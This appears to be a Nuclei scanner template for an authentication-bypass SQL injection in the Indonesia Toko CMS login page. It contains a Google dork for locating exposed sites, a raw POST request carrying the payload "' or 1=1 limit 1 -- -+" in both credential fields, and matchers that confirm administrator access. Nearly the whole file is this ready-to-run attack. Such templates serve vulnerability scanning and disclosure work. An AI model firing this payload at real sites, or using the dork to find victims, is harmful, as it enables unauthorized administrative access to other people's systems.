id: indonasia-toko-cms-sql

info:
  name: Indonasia Toko CMS - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    Indonesia Toko CMS is susceptible to SQL Injection in its login system, enabling attackers to exploit vulnerabilities and bypass authentication by injecting malicious SQL code.
  reference:
    - https://cxsecurity.com/issue/WLB-2019030008
  metadata:
    verified: true
    max-request: 1
    google-query: inurl:"index.php?mnu=login"
  tags: sqli,toko,cms

http:
  - raw:
      - |
        POST /index.php?mnu=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user=%27+or+1%3D1+limit+1+--+-%2B&pass=%27+or+1%3D1+limit+1+--+-%2B&Login=Login

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "alert('Administrator"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502203d04c4a7341f916ec9176c0e49e61749ec790649d032268d09c21e675bb970b00221009184b6e36255c1c8c5f106f42c328937493239e2abc42eea8daf305aeb55b1b9:922c64590222798bb761d5b6d8e72950